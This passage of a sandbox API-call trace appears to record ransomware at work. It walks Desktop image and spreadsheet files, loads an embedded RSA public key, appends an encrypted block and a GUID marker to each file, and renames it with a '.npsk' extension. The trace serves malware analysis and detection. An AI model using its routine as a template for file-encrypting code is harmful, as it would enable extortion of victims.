[0214.951] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0214.952] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x7509, lpOverlapped=0x0) returned 1 [0214.952] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.952] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.952] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.953] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0214.954] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0214.954] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0214.954] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0214.954] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0214.954] GetLastError () returned 0x0 [0214.954] CryptDestroyHash (hHash=0x3277d68) returned 1 [0214.954] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0214.954] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0214.954] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0214.954] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0214.954] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0214.954] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.954] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0214.955] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x7509, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.955] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0214.955] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0214.955] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0214.955] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0214.955] CloseHandle (hObject=0x61c) returned 1 [0214.958] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Qmx9sV04.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qmx9sv04.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Qmx9sV04.gif.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qmx9sv04.gif.npsk")) returned 1 [0214.958] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a91f88 | out: hHeap=0x750000) returned 1 [0214.958] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.958] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0214.960] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7bce58 | out: hHeap=0x750000) returned 1 [0214.960] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3cb4d310, ftCreationTime.dwHighDateTime=0x1d5dff6, ftLastAccessTime.dwLowDateTime=0x4ac5c990, ftLastAccessTime.dwHighDateTime=0x1d5db15, ftLastWriteTime.dwLowDateTime=0x4ac5c990, ftLastWriteTime.dwHighDateTime=0x1d5db15, nFileSizeHigh=0x0, nFileSizeLow=0x4956, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RSwBc ju7leGFg.bmp", cAlternateFileName="RSWBCJ~1.BMP")) returned 1 [0214.960] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RSwBc ju7leGFg.bmp") returned=".bmp" [0214.960] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RSwBc ju7leGFg.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rswbc ju7legfg.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0214.960] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=18774) returned 1 [0214.960] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0214.962] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x4930, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.962] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0214.963] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x4956, lpOverlapped=0x0) returned 1 [0214.963] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.963] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.963] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.963] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b20a0) returned 1 [0214.965] CryptCreateHash (in: hProv=0x7b20a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0214.965] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0214.965] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0214.965] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0214.965] GetLastError () returned 0x0 [0214.965] CryptDestroyHash (hHash=0x3277d68) returned 1 [0214.965] CryptReleaseContext (hProv=0x7b20a0, dwFlags=0x0) returned 1 [0214.965] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0214.965] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0214.965] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0214.965] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0214.965] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.965] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0214.966] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x4956, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.966] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0214.966] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0214.966] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0214.966] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0214.966] CloseHandle (hObject=0x61c) returned 1 [0214.967] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RSwBc ju7leGFg.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rswbc ju7legfg.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RSwBc ju7leGFg.bmp.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rswbc ju7legfg.bmp.npsk")) returned 1 [0214.968] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a91f88 | out: hHeap=0x750000) returned 1 [0214.968] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.968] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0214.969] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7b1d70 | out: hHeap=0x750000) returned 1 [0214.969] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb08a5c90, ftCreationTime.dwHighDateTime=0x1d5decc, ftLastAccessTime.dwLowDateTime=0x107f7250, ftLastAccessTime.dwHighDateTime=0x1d5e5a5, ftLastWriteTime.dwLowDateTime=0x107f7250, ftLastWriteTime.dwHighDateTime=0x1d5e5a5, nFileSizeHigh=0x0, nFileSizeLow=0x128e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S-ySOqN.png", cAlternateFileName="")) returned 1 [0214.969] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\S-ySOqN.png") returned=".png" [0214.970] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\S-ySOqN.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\s-ysoqn.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0214.970] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=4750) returned 1 [0214.970] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0214.972] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x1268, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.972] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0214.973] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x128e, lpOverlapped=0x0) returned 1 [0214.973] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.973] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.973] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.973] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0214.974] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0214.974] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0214.974] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0214.974] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0214.974] GetLastError () returned 0x0 [0214.974] CryptDestroyHash (hHash=0x3277d68) returned 1 [0214.974] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0214.974] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0214.974] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0214.974] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0214.974] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0214.974] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.975] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0214.975] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x128e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.975] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0214.975] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0214.975] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0214.975] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0214.975] CloseHandle (hObject=0x61c) returned 1 [0214.983] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\S-ySOqN.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\s-ysoqn.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\S-ySOqN.png.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\s-ysoqn.png.npsk")) returned 1 [0214.984] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a91f88 | out: hHeap=0x750000) returned 1 [0214.984] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.984] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0214.985] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7bce58 | out: hHeap=0x750000) returned 1 [0214.985] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72e00e30, ftCreationTime.dwHighDateTime=0x1d5db84, ftLastAccessTime.dwLowDateTime=0xe9f509b0, ftLastAccessTime.dwHighDateTime=0x1d5e149, ftLastWriteTime.dwLowDateTime=0xe9f509b0, ftLastWriteTime.dwHighDateTime=0x1d5e149, nFileSizeHigh=0x0, nFileSizeLow=0xfa41, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SfxkhLPbwY80mBkm.xls", cAlternateFileName="SFXKHL~1.XLS")) returned 1 [0214.985] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SfxkhLPbwY80mBkm.xls") returned=".xls" [0214.985] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SfxkhLPbwY80mBkm.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sfxkhlpbwy80mbkm.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0214.986] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=64065) returned 1 [0214.986] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0214.987] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xfa1b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.988] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0214.989] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xfa41, lpOverlapped=0x0) returned 1 [0214.990] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.990] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.990] lstrlenA (lpString="-----BEGIN PUBLIC 